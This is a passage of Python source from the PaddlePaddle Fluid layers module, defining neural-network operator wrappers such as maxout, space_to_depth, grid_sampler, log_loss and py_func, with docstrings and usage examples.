inputs = {"X": [x], "Y": [y]}
attrs = {"x_num_col_dims": x_num_col_dims, "y_num_col_dims": y_num_col_dims}
helper = LayerHelper("mul", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'mul')
check_variable_and_dtype(y, 'y', ['float16', 'float32', 'float64'], 'mul')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="mul", inputs={"X": x,
"Y": y}, attrs=attrs, outputs={"Out": out})
return out
@templatedoc()
def maxout(x, groups, name=None, axis=1):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
groups(int): ${groups_comment}
axis(int, optional): ${axis_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: ${out_comment}
Raises:
ValueError: If `axis` is not 1, -1 or 3.
ValueError: If the number of input channels can not be divisible by `groups`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name='data',
shape=[None, 256, 32, 32],
dtype='float32')
out = fluid.layers.maxout(input, groups=2)
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'maxout')
helper = LayerHelper("maxout", **locals())
if axis not in [1, -1, 3]:
raise ValueError(
"Attr(axis) should be 1 when data format is NCHW, -1 or 3 when data format is NHWC. Received "
"Attr(axis): %s." % str(axis))
if axis == -1:
axis = 3
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="maxout",
inputs={"X": x},
attrs={"groups": groups,
"axis": axis},
outputs={"Out": out})
return out
def space_to_depth(x, blocksize, name=None):
"""
    Given a blocksize, space_to_depth rearranges the input LoDTensor with layout [batch, channel, height, width].
    This op rearranges blocks of spatial data into depth. More specifically, this op outputs a copy of \
    the input LoDTensor where values from the height and width dimensions are moved to the channel \
    dimension.
    The attr blocksize indicates the input block size.
    space_to_depth will reorganize the elements of input with shape [batch, channel, height, width] \
    according to blocksize to construct output with shape \
    [batch, channel * blocksize * blocksize, height/blocksize, width/blocksize]:
    - Non-overlapping blocks of size blocksize x blocksize are rearranged into depth at each location.
    - The Y, X coordinates within each block of the input become the high order component of the output channel index
    - channel should be divisible by the square of blocksize
    - height and width should be divisible by blocksize
This OP is useful for resizing the activations between convolutions \
(but keeping all data)
.. code-block:: text
Given the input x with the shape [1, 1, 4, 4]:
x.data = [[[[1, 2, 5, 6],
[3, 4, 7, 8],
[9, 10, 13, 14],
[11, 12, 15, 16]]]]
blocksize = 2
then get the output with the shape [1, 4, 2, 2]:
out.data = [[[[1, 2], [3, 4]],
[[5, 6], [7, 8]],
[[9, 10], [11, 12]],
[[13, 14], [15, 16]]]]
Args:
x (Variable): The input, which should be 4 dims Tensor or LodTensor, with the shape \
[batch, channel, height, width]
blocksize (int): The blocksize to select the element on each feature map should be > 2
name(str, optional): For detailed information, please refer \
to :ref:`api_guide_Name`. Usually name is no need to set and \
None by default.
    Returns: The output, which should be a 4-D Tensor or LoDTensor, with the shape \
        [batch, channel * blocksize * blocksize, height/blocksize, width/blocksize]
    Return Type: Variable
    Raises:
        ValueError: If ``blocksize`` is not a Python int.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(
name='data', shape=[1, 4, 2, 2], dtype='float32')
space_to_depthed = fluid.layers.space_to_depth(
x=data, blocksize=2)
exe = fluid.Executor(fluid.CPUPlace())
data_np = np.arange(0,16).reshape((1,4,2,2)).astype('float32')
print(data_np)
#array([[[[ 0., 1.], [ 2., 3.]],
# [[ 4., 5.], [ 6., 7.]],
# [[ 8., 9.], [10., 11.]],
# [[12., 13.], [14., 15.]]]], dtype=float32)
out_main = exe.run(fluid.default_main_program(),
feed={'data': data_np},
fetch_list=[space_to_depthed])
print(out_main)
#[array([[[[ 0.]], [[ 4.]], [[ 1.]], [[ 5.]],
# [[ 8.]], [[12.]], [[ 9.]], [[13.]],
# [[ 2.]], [[ 6.]], [[ 3.]], [[ 7.]],
# [[10.]], [[14.]], [[11.]], [[15.]]]], dtype=float32)]
"""
helper = LayerHelper("space_to_depth", **locals())
    if not isinstance(blocksize, int):
        raise ValueError("blocksize must be a Python int")
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="space_to_depth",
inputs={"X": x},
attrs={"blocksize": blocksize},
outputs={"Out": out})
return out
def affine_channel(x,
scale=None,
bias=None,
data_layout='NCHW',
name=None,
act=None):
"""
Applies a separate affine transformation to each channel of the input.
Useful for replacing spatial batch norm with its equivalent fixed
transformation. The input also can be 2D tensor and applies a affine
transformation in second dimension.
Args:
x (Variable): Feature map input can be a 4D tensor with order NCHW
or NHWC. It also can be a 2D tensor and the affine transformation
is applied in the second dimension.The data type is float32 or float64.
scale (Variable): 1D input of shape (C), the c-th element is the scale
factor of the affine transformation for the c-th channel of
the input.The data type is float32 or float64.
bias (Variable): 1D input of shape (C), the c-th element is the bias
of the affine transformation for the c-th channel of the input.
The data type is float32 or float64.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`. If input is 2D Tensor, you can ignore
data_layout.
name (str, default None): The name of this layer. For more information,
please refer to :ref:`api_guide_Name` .
act (str, default None): Activation to be applied to the output of this layer.
Returns:
Variable: A tensor which has the same shape, data layout and data type with x.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
use_gpu = False
place = fluid.CUDAPlace(0) if use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
data = fluid.data(name='data', shape=[None, 1, 2, 2], dtype='float32')
input_scale = fluid.layers.create_parameter(shape=[1], dtype="float32",
default_initializer=fluid.initializer.Constant(2.0))
input_bias = fluid.layers.create_parameter(shape=[1],dtype="float32",
default_initializer=fluid.initializer.Constant(0.5))
out = fluid.layers.affine_channel(data,scale=input_scale,
bias=input_bias)
exe.run(fluid.default_startup_program())
test_program = fluid.default_main_program().clone(for_test=True)
[out_array] = exe.run(test_program,
fetch_list=out,
feed={'data': np.ones([1,1,2,2]).astype('float32')})
# out_array is [[[[2.5, 2.5],
# [2.5, 2.5]]]] with shape: [1, 1, 2, 2]
"""
helper = LayerHelper("affine_channel", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="affine_channel",
inputs={"X": x,
'Scale': scale,
'Bias': bias},
attrs={"data_layout": data_layout},
outputs={"Out": out})
return helper.append_activation(out)
def similarity_focus(input, axis, indexes, name=None):
"""
SimilarityFocus Operator
Generate a similarity focus mask with the same shape of input using the following method:
1. Extract the 3-D tensor(here the first dimension is BatchSize) corresponding
to the axis according to the indexes. For example, if axis=1 and indexes=[a],
it will get the matrix T=X[:, a, :, :]. In this case, if the shape of input X
is (BatchSize, A, B, C), the shape of tensor T is (BatchSize, B, C).
    2. For each index, find the largest numbers in the tensor T, so that each
       row and each column contains at most one selected number (that is, once the
       largest number has been found in the i-th row and the j-th column, the
       remaining numbers in that row and column are skipped, and the next
       largest number is selected from the rest; obviously min(B, C) numbers
       are selected in total). Mark the corresponding positions of the
       3-D similarity focus mask as 1, otherwise as 0. Do an element-wise OR over
       all indexes.
3. Broadcast the 3-D similarity focus mask to the same shape of input X.
Refer to `Similarity Focus Layer <http://www.aclweb.org/anthology/N16-1108>`_
.. code-block:: text
* Example :
Given a 4-D tensor x with the shape (BatchSize, C, A, B), where C is
the number of channels and the shape of feature map is (A, B):
x.shape = (2, 3, 2, 2)
x.data = [[[[0.8, 0.1],
[0.4, 0.5]],
[[0.9, 0.7],
[0.9, 0.9]],
[[0.8, 0.9],
[0.1, 0.2]]],
[[[0.2, 0.5],
[0.3, 0.4]],
[[0.9, 0.7],
[0.8, 0.4]],
[[0.0, 0.2],
[0.4, 0.7]]]]
Given axis: 1 (the axis of the channel)
Given indexes: [0]
then we get a 4-D tensor out with the same shape of input x:
out.shape = (2, 3, 2, 2)
out.data = [[[[1.0, 0.0],
[0.0, 1.0]],
[[1.0, 0.0],
[0.0, 1.0]],
[[1.0, 0.0],
[0.0, 1.0]]],
[[[0.0, 1.0],
[1.0, 0.0]],
[[0.0, 1.0],
[1.0, 0.0]],
[[0.0, 1.0],
[1.0, 0.0]]]]
Args:
input(Variable): The input tensor variable(default float). It should
be a 4-D tensor with shape [BatchSize, A, B, C]. Data type is
float32 or float64.
axis(int): Indicating the dimension to be selected. It can only be
1, 2 or 3.
indexes(list): Indicating the indexes of the selected dimension.
Returns:
Variable: A tensor variable with the same shape and same type \
as the input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(
name='data', shape=[-1, 3, 2, 2], dtype='float32')
fluid.layers.similarity_focus(input=data, axis=1, indexes=[0])
"""
helper = LayerHelper('similarity_focus', **locals())
# check attrs
if isinstance(axis, int) is False:
raise TypeError("axis must be int type.")
if isinstance(indexes, list) is False:
raise TypeError("indexes must be list type.")
if axis != 1 and axis != 2 and axis != 3:
raise ValueError("axis must be 1, 2 or 3.")
if len(indexes) == 0:
raise ValueError("indexes can not be empty.")
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='similarity_focus',
inputs={'X': input},
outputs={'Out': out},
attrs={"axis": axis,
"indexes": indexes})
return out
def hash(input, hash_size, num_hash=1, name=None):
"""
    This OP hashes the input to an integer less than the hash_size.
    The hash algorithm used is xxHash - Extremely fast hash algorithm
    (https://github.com/Cyan4973/xxHash/tree/v0.6.5)
    Args:
        input(Variable): A **Two-Dimensional** LoDTensor with type int32, int64.
             **Only support LoDTensor**.
        hash_size(int): The upper bound of the hash results; every output value lies in the range [0, hash_size).
        num_hash(int, optional): The number of times to hash, default is 1.
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Variable: A LoDTensor with the same data type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
place = fluid.core.CPUPlace()
x = fluid.data(name="x", shape=[1], dtype="int32", lod_level=1)
res = fluid.layers.hash(name="res",input=x, hash_size=1000, num_hash=4)
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
in1 = np.array([[1,2],[3,4]]).astype("int32")
print(in1)
x_i = fluid.core.LoDTensor()
x_i.set(in1,place)
x_i.set_recursive_sequence_lengths([[0,2]])
res = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res], return_numpy=False)
print(np.array(res[0]))
# [[[722]
# [407]
# [337]
# [395]]
# [[603]
# [590]
# [386]
# [901]]]
"""
helper = LayerHelper('hash', **locals())
out = helper.create_variable_for_type_inference(
helper.input_dtype(), stop_gradient=True)
helper.append_op(
type='hash',
inputs={'X': input},
outputs={'Out': out},
attrs={'num_hash': num_hash,
'mod_by': hash_size})
return out
@templatedoc()
def grid_sampler(x, grid, name=None):
"""
This operation samples input X by using bilinear interpolation based on
flow field grid, which is usually generated by :code:`affine_grid` . The grid of
shape [N, H, W, 2] is the concatenation of (x, y) coordinates
with shape [N, H, W] each, where x is indexing the 4th dimension
(in width dimension) of input data x and y is indexing the 3rd
    dimension (in height dimension); the final result is the bilinear
    interpolation value of the 4 nearest corner points. The output tensor
    shape will be [N, C, H, W].
.. code-block:: text
Step 1:
Get (x, y) grid coordinates and scale to [0, H-1/W-1].
.. code-block:: text
grid_x = 0.5 * (grid[:, :, :, 0] + 1) * (W - 1)
grid_y = 0.5 * (grid[:, :, :, 1] + 1) * (H - 1)
Step 2:
Indices input data X with grid (x, y) in each [H, W] area, and bilinear
interpolate point value by 4 nearest points.
wn ------- y_n ------- en
| | |
| d_n |
| | |
x_w --d_w-- grid--d_e-- x_e
| | |
| d_s |
| | |
              ws ------- y_s ------- es
x_w = floor(x) // west side x coord
x_e = x_w + 1 // east side x coord
y_n = floor(y) // north side y coord
            y_s = y_n + 1 // south side y coord
d_w = grid_x - x_w // distance to west side
d_e = x_e - grid_x // distance to east side
d_n = grid_y - y_n // distance to north side
d_s = y_s - grid_y // distance to south side
wn = X[:, :, y_n, x_w] // north-west point value
en = X[:, :, y_n, x_e] // north-east point value
            ws = X[:, :, y_s, x_w] // south-west point value
            es = X[:, :, y_s, x_e] // south-east point value
output = wn * d_e * d_s + en * d_w * d_s
+ ws * d_e * d_n + es * d_w * d_n
Args:
x(Variable): The input tensor, which is a 4-D tensor with shape
[N, C, H, W], N is the batch size, C is the channel
number, H and W is the feature height and width.
The data type is float32 or float64.
grid(Variable): Input grid tensor of shape [N, H, W, 2]. The
data type is float32 or float64.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: Output of shape [N, C, H, W] data samples input X
using bilnear interpolation based on input grid.
The data type is same as input tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# use with affine_grid
x = fluid.data(name='x', shape=[None, 10, 32, 32], dtype='float32')
theta = fluid.layers.data(name='theta', shape=[2, 3], dtype='float32')
grid = fluid.layers.affine_grid(theta=theta, out_shape=[3, 10, 32, 32])
out = fluid.layers.grid_sampler(x=x, grid=grid)
"""
helper = LayerHelper("grid_sampler", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'grid_sampler')
check_variable_and_dtype(grid, 'grid', ['float32', 'float64'],
'grid_sampler')
    if not isinstance(x, Variable):
        raise ValueError("The x should be a Variable")
    if not isinstance(grid, Variable):
        raise ValueError("The grid should be a Variable")
out = helper.create_variable_for_type_inference(x.dtype)
ipts = {'X': x, 'Grid': grid}
helper.append_op(type='grid_sampler', inputs=ipts, outputs={'Output': out})
return out
def log_loss(input, label, epsilon=1e-4, name=None):
"""
**Negative Log Loss Layer**
This layer accepts input predictions and target label and returns the
negative log loss.
.. math::
Out = -label * \\log{(input + \\epsilon)}
- (1 - label) * \\log{(1 - input + \\epsilon)}
Args:
input (Variable|list): A 2-D tensor with shape [N x 1], where N is the
batch size. This input is a probability computed
by the previous operator. Data type float32.
label (Variable|list): The ground truth which is a 2-D tensor with
shape [N x 1], where N is the batch size.
Data type float32.
epsilon (float, optional): A small number for numerical stability. Default 1e-4.
name(str|None): For detailed information, please refer to
:ref:`api_guide_Name` . Usually name is no need to set and None by default.
Returns:
Variable: A 2-D tensor with shape [N x 1], the negative log loss.
Examples:
.. code-block:: python
import paddle.fluid as fluid
label = fluid.data(name='label', shape=[None, 1], dtype='float32')
prob = fluid.data(name='prob', shape=[None, 1], dtype='float32')
cost = fluid.layers.log_loss(input=prob, label=label)
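
        A runnable sketch that checks the output against the formula above
        (``epsilon`` left at its default of 1e-4):

        .. code-block:: python

            import paddle.fluid as fluid
            import numpy as np

            label = fluid.data(name='label', shape=[None, 1], dtype='float32')
            prob = fluid.data(name='prob', shape=[None, 1], dtype='float32')
            cost = fluid.layers.log_loss(input=prob, label=label)
            exe = fluid.Executor(fluid.CPUPlace())
            exe.run(fluid.default_startup_program())
            prob_np = np.array([[0.7], [0.2]], dtype='float32')
            label_np = np.array([[1.0], [0.0]], dtype='float32')
            res, = exe.run(feed={'prob': prob_np, 'label': label_np},
                           fetch_list=[cost])
            expected = -label_np * np.log(prob_np + 1e-4) \
                       - (1 - label_np) * np.log(1 - prob_np + 1e-4)
            print(np.allclose(res, expected))  # True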
"""
helper = LayerHelper('log_loss', **locals())
loss = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='log_loss',
inputs={'Predicted': [input],
'Labels': [label]},
outputs={'Loss': [loss]},
attrs={'epsilon': epsilon})
return loss
def add_position_encoding(input, alpha, beta, name=None):
"""
This operator performs weighted sum of input feature at each position
(position in the sequence) and the corresponding position encoding.
For more details of position encoding, please refer to `Attention Is All You
Need <http://arxiv.org/pdf/1706.03762.pdf>`_ .
The formula is as follows:
.. math::
PE(pos, 2i) &= \\sin{(pos / 10000^{2i / P})} \\\\
PE(pos, 2i + 1) &= \\cos{(pos / 10000^{2i / P})} \\\\
Out(:, pos, i) &= \\alpha * input(:, pos, i) + \\beta * PE(pos, i)
Where:
- :math:`PE(pos, 2i)` : the value at even index `2i` for encoding of position `pos`.
- :math:`PE(pos, 2i + 1)` : the value at odd index `2i+1` for encoding of position `pos`
Args:
input(Variable): A Tensor or LoDTensor (lod level is 1). If it is a
Tensor, the shape should be `[N, M, P]`, where `N` stands for
batch size, `M` for sequence length, `P` for the size of feature
dimension. If it is a LoDTensor, the shape should be `[N, P]`,
where `N` stands for the total sequence lengths in this mini-batch,
`P` for the size of feature. The data type should be float32 or float64.
alpha(float): Indicate the weight coefficient for `input` when performing
weighted sum.
beta(float): Indicate the weight coefficient for position encoding when
performing weighted sum.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: A Tensor or LoDTensor. It has the same shape, data type and lod as `input`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
tensor = fluid.data(
name='tensor',
shape=[None, 64, 512],
dtype='float32')
position_tensor = fluid.layers.add_position_encoding(
input=tensor, alpha=1.0, beta=1.0)
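
        For reference, a numpy sketch of the position encoding formula above
        (illustrative only; it assumes an even feature size ``P`` and is not
        the operator's own implementation):

        .. code-block:: python

            import numpy as np

            def position_encoding(seq_len, feat_size):
                # PE(pos, 2i)   = sin(pos / 10000^(2i / P))
                # PE(pos, 2i+1) = cos(pos / 10000^(2i / P))
                pe = np.zeros((seq_len, feat_size), dtype='float32')
                pos = np.arange(seq_len, dtype='float32')[:, None]
                even = np.arange(0, feat_size, 2, dtype='float32')[None, :]
                angle = pos / np.power(10000.0, even / float(feat_size))
                pe[:, 0::2] = np.sin(angle)
                pe[:, 1::2] = np.cos(angle)
                return pe

            # Out(:, pos, i) = alpha * input(:, pos, i) + beta * PE(pos, i)
            pe = position_encoding(seq_len=64, feat_size=512)
            print(pe.shape)  # (64, 512)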
"""
helper = LayerHelper('add_position_encoding', **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype=dtype)
helper.append_op(
type="add_position_encoding",
inputs={"X": input},
outputs={"Out": out},
attrs={"alpha": alpha,
"beta": beta})
return out
def bilinear_tensor_product(x,
y,
size,
act=None,
name=None,
param_attr=None,
bias_attr=None):
"""
**Bilinear Tensor Product Layer**
This layer performs bilinear tensor product on two inputs.
For example:
.. math::
out_{i} = x * W_{i} * {y^\mathrm{T}}, i=0,1,...,size-1
In this formula:
- :math:`x`: the first input contains M elements, shape is [batch_size, M].
- :math:`y`: the second input contains N elements, shape is [batch_size, N].
- :math:`W_{i}`: the i-th learned weight, shape is [M, N].
- :math:`out_{i}`: the i-th element of out, shape is [batch_size, size].
    - :math:`y^\mathrm{T}`: the transpose of :math:`y`.
Args:
x (Variable): 2-D input tensor with shape [batch_size, M]. Data type
is float32 or float64.
y (Variable): 2-D input tensor with shape [batch_size, N]. Data type
should be same as **x**.
size (int): The dimension of this layer.
act (str|None): Activation to be applied to the output of this layer. Default None.
name(str|None): For detailed information, please refer to
:ref:`api_guide_Name` . Usually name is no need to set and None by default.
param_attr (ParamAttr|None): To specify the weight parameter attribute.
Default: None, which means the default weight parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
bias_attr (ParamAttr|None): To specify the bias parameter attribute.
Default: None, which means the default bias parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
Returns:
Variable: A 2-D Tensor of shape [batch_size, size]. Data type is the same as input **x**.
Examples:
.. code-block:: python
import paddle.fluid as fluid
layer1 = fluid.data("t1", shape=[-1, 5], dtype="float32")
layer2 = fluid.data("t2", shape=[-1, 4], dtype="float32")
tensor = fluid.layers.bilinear_tensor_product(x=layer1, y=layer2, size=1000)
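A numpy sketch (made-up data, bias omitted) of the formula above, where the learned
weight W has shape [size, M, N]; illustrative only, not the op implementation:

.. code-block:: python

    import numpy as np

    batch, M, N, size = 2, 5, 4, 3
    x_np = np.random.rand(batch, M).astype('float32')
    y_np = np.random.rand(batch, N).astype('float32')
    W = np.random.rand(size, M, N).astype('float32')
    # out[b, i] = x[b] @ W[i] @ y[b]^T
    out_np = np.einsum('bm,imn,bn->bi', x_np, W, y_np)   # shape [batch, size]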
"""
helper = LayerHelper('bilinear_tensor_product', **locals())
dtype = helper.input_dtype('x')
param_shape = [size, x.shape[1], y.shape[1]]
w = helper.create_parameter(
attr=helper.param_attr, shape=param_shape, dtype=dtype, is_bias=False)
out = helper.create_variable_for_type_inference(dtype=dtype)
inputs = {"X": x, "Y": y, "Weight": w}
if helper.bias_attr:
bias_size = [1, size]
bias = helper.create_parameter(
attr=helper.bias_attr, shape=bias_size, dtype=dtype, is_bias=True)
inputs["Bias"] = bias
helper.append_op(
type="bilinear_tensor_product", inputs=inputs, outputs={"Out": out})
# add activation
return helper.append_activation(out)
@templatedoc()
def get_tensor_from_selected_rows(x, name=None):
"""
This operator gets tensor data from input with SelectedRows type, and outputs a LoDTensor.
.. code-block:: text
input x is SelectedRows:
x.rows = [0, 5, 5, 4, 19]
x.height = 20
x.value = [[1, 1] [2, 2] [2, 2] [3, 3] [6, 6]]
Output is LoDTensor:
out.shape = [5, 2]
out.data = [[1, 1],
[2, 2],
[2, 2],
[3, 3],
[6, 6]]
Args:
x(SelectedRows): Input with SelectedRows type. The data type is float32, float64, int32 or int64.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: LoDTensor transformed from SelectedRows. The data type is same with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
b = fluid.default_main_program().global_block()
input = b.create_var(name="X", dtype="float32", persistable=True, type=fluid.core.VarDesc.VarType.SELECTED_ROWS)
out = fluid.layers.get_tensor_from_selected_rows(input)
"""
helper = LayerHelper('get_tensor_from_selected_rows', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='get_tensor_from_selected_rows',
inputs={'X': x},
outputs={'Out': out},
attrs={})
return out
def shuffle_channel(x, group, name=None):
"""
This operator shuffles the channels of input x.
It divides the input channels into :attr:`group` subgroups, and obtains a new
channel order by selecting one element from every subgroup in turn.
Please refer to the paper
https://arxiv.org/pdf/1707.01083.pdf
.. code-block:: text
Given a 4-D tensor input with the shape (N, C, H, W):
input.shape = (1, 4, 2, 2)
input.data =[[[[0.1, 0.2],
[0.2, 0.3]],
[[0.3, 0.4],
[0.4, 0.5]],
[[0.5, 0.6],
[0.6, 0.7]],
[[0.7, 0.8],
[0.8, 0.9]]]]
Given group: 2
then we get a 4-D tensor out with the same shape as the input:
out.shape = (1, 4, 2, 2)
out.data = [[[[0.1, 0.2],
[0.2, 0.3]],
[[0.5, 0.6],
[0.6, 0.7]],
[[0.3, 0.4],
[0.4, 0.5]],
[[0.7, 0.8],
[0.8, 0.9]]]]
Args:
x(Variable): The input tensor variable. It should be a 4-D tensor with shape [N, C, H, W]
group(int): The number of subgroups. It should divide the number of channels.
Returns:
out(Variable): the channels shuffling result is a tensor variable with the
same shape and same type as the input.
Raises:
TypeError: If group is not an int.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name='input', shape=[None,4,2,2], dtype='float32')
out = fluid.layers.shuffle_channel(x=input, group=2)
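A numpy sketch of the rearrangement described above (split into groups, transpose,
reshape back); illustrative only, not the op implementation:

.. code-block:: python

    import numpy as np

    x_np = np.random.rand(1, 4, 2, 2).astype('float32')
    N, C, H, W = x_np.shape
    g = 2
    out_np = (x_np.reshape(N, g, C // g, H, W)   # split channels into g groups
                  .transpose(0, 2, 1, 3, 4)      # take one channel from each group in turn
                  .reshape(N, C, H, W))          # channel order becomes [0, 2, 1, 3]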
"""
helper = LayerHelper("shuffle_channel", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if not isinstance(group, int):
raise TypeError("group must be int type")
helper.append_op(
type="shuffle_channel",
inputs={"X": x},
outputs={"Out": out},
attrs={"group": group})
return out
@templatedoc()
def temporal_shift(x, seg_num, shift_ratio=0.25, name=None):
"""
**Temporal Shift Operator**
${comment}
Args:
x(Variable): ${x_comment}
seg_num(int): ${seg_num_comment}
shift_ratio(float): ${shift_ratio_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
out(Variable): The temporal shifting result is a tensor variable with the
same shape and same data type as the input.
Raises:
TypeError: seg_num must be int type.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name='input', shape=[None,4,2,2], dtype='float32')
out = fluid.layers.temporal_shift(x=input, seg_num=2, shift_ratio=0.2)
"""
helper = LayerHelper("temporal_shift", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'temporal_shift')
check_type(seg_num, 'seg_num', int, 'temporal_shift')
check_type(shift_ratio, 'shift_ratio', float, 'temporal_shift')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if not isinstance(seg_num, int):
raise TypeError("seg_num must be int type.")
helper.append_op(
type="temporal_shift",
inputs={"X": x},
outputs={"Out": out},
attrs={"seg_num": seg_num,
"shift_ratio": shift_ratio})
return out
class PyFuncRegistry(object):
_register_funcs = []
def __init__(self, func):
if func is None or not callable(func):
raise TypeError('func must be a Python function')
self._func = func
# find named args using reflection
args = inspect.getargspec(self._func)
if len(args[0]) == 0 and args[1] is None and args[2] is None:
# Function with no inputs
self._named_args = None
else:
self._named_args = args[0]
self._id = core._append_python_callable_object_and_return_id(self)
'''
Why record self here?
1. For debug usage. Users can call
:code:`py_func.registered_func(idx)` method
to find the registered function corresponding
to :code:`idx`.
2. For increasing reference count of self.
It seems that to release Python object
whose reference count is 1 would cause
segmentation fault error in C++ side.
May be lack of Python GC in C++ side?
'''
PyFuncRegistry._register_funcs.append(self)
@classmethod
def registered_func(cls, idx):
return cls._register_funcs[idx]._func
@classmethod
def registered_func_num(cls):
return len(cls._register_funcs)
@property
def id(self):
return self._id
def __call__(self, *args):
if self._named_args is None:
func_ret = self._func()
else:
kwargs = dict()
idx = 0
for arg in self._named_args:
kwargs[arg] = args[idx]
idx += 1
func_ret = self._func(*args[idx:], **kwargs)
if not isinstance(func_ret, (list, tuple)):
func_ret = (func_ret, )
ret = []
for each_ret in func_ret:
if each_ret is None or isinstance(each_ret, core.LoDTensor):
ret.append(each_ret)
continue
if not isinstance(each_ret, np.ndarray):
each_ret = np.array(each_ret)
tensor = core.LoDTensor()
tensor.set(each_ret, core.CPUPlace())
ret.append(tensor)
return tuple(ret)
@templatedoc()
def py_func(func, x, out, backward_func=None, skip_vars_in_backward_input=None):
"""
This OP is used to register customized Python OP to Paddle Fluid. The design
principle of py_func is that LoDTensor and numpy arrays can be converted to each
other easily. So you can use Python and numpy API to register a python OP.
The forward function of the registered OP is ``func`` and the backward function
of that is ``backward_func``. Paddle will call ``func`` at forward runtime and
call ``backward_func`` at backward runtime (if ``backward_func`` is not None).
``x`` is the input of ``func``, whose type must be LoDTensor; ``out`` is
the output of ``func``, whose type can be either LoDTensor or numpy array.
The input of the backward function ``backward_func`` is ``x``, ``out`` and
the gradient of ``out``. If some variables of ``out`` have no gradient, the
relevant input variable of ``backward_func`` is None. If some variables of
``x`` do not have a gradient, the user should return None in ``backward_func``.
The data type and shape of ``out`` should also be set correctly before this
API is called, and the data type and shape of the gradient of ``out`` and
``x`` will be inferred automatically.
This API can also be used to debug the neural network by setting the ``func``
as a function that only prints variables.
Args:
func (callable): The forward function of the registered OP. When the network
is running, the forward output ``out`` will be calculated according to this
function and the forward input ``x``. In ``func`` , it's suggested that we
actively convert LoDTensor into a numpy array, so that we can use Python and
numpy API arbitrarily. If not, some operations of numpy may not be compatible.
x (Variable|tuple(Variable)|list[Variable]): The input of the forward function ``func``.
It can be Variable|tuple(Variable)|list[Variable], where Variable is LoDTensor or
Tensor. In addition, multiple Variables should be passed in the form of tuple(Variable)
or list[Variable].
out (Variable|tuple(Variable)|list[Variable]): The output of the forward function ``func``,
it can be Variable|tuple(Variable)|list[Variable], where Variable can be either LoDTensor
or numpy array. Since Paddle cannot automatically infer the shape and type of ``out``,
you must create ``out`` in advance.
backward_func (callable, optional): The backward function of the registered OP.
Its default value is None, which means there is no reverse calculation. If
it is not None, ``backward_func`` is called to calculate the gradient of
``x`` when the network is at backward runtime.
skip_vars_in_backward_input (Variable, optional): It's used to limit the input
variable list of ``backward_func``, and it can be Variable|tuple(Variable)|list[Variable].
It must belong to either ``x`` or ``out``. The default value is None, which means
that no variables need to be removed from ``x`` and ``out``. If it is not None,
these variables will not be the input of ``backward_func``. This parameter is only
useful when ``backward_func`` is not None.
Returns:
Variable|tuple(Variable)|list[Variable]: The output ``out`` of the forward function ``func``.
Examples:
.. code-block:: python
# example 1:
import paddle.fluid as fluid
import six
import numpy as np
# Creates a forward function, LoDTensor can be input directly without
# being converted into numpy array.
def tanh(x):
return np.tanh(x)
# Skip x in backward function and return the gradient of x
# LoDTensor must be actively converted to numpy array, otherwise,
# operations such as +/- can't be used.
def tanh_grad(y, dy):
return np.array(dy) * (1 - np.square(np.array(y)))
# Creates a forward function for debugging running networks(print value)
def debug_func(x):
print(x)
def create_tmp_var(name, dtype, shape):
return fluid.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def simple_net(img, label):
hidden = img
for idx in six.moves.range(4):
hidden = fluid.layers.fc(hidden, size=200)
new_hidden = create_tmp_var(name='hidden_{}'.format(idx),
dtype=hidden.dtype, shape=hidden.shape)
# User-defined forward and backward
hidden = fluid.layers.py_func(func=tanh, x=hidden,
out=new_hidden, backward_func=tanh_grad,
skip_vars_in_backward_input=hidden)
# User-defined debug functions that print out the input LoDTensor
fluid.layers.py_func(func=debug_func, x=hidden, out=None)
prediction = fluid.layers.fc(hidden, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=prediction, label=label)
return fluid.layers.mean(loss)
# example 2:
# This example shows how to turn LoDTensor into numpy array and
# use numpy API to register an Python OP
import paddle.fluid as fluid
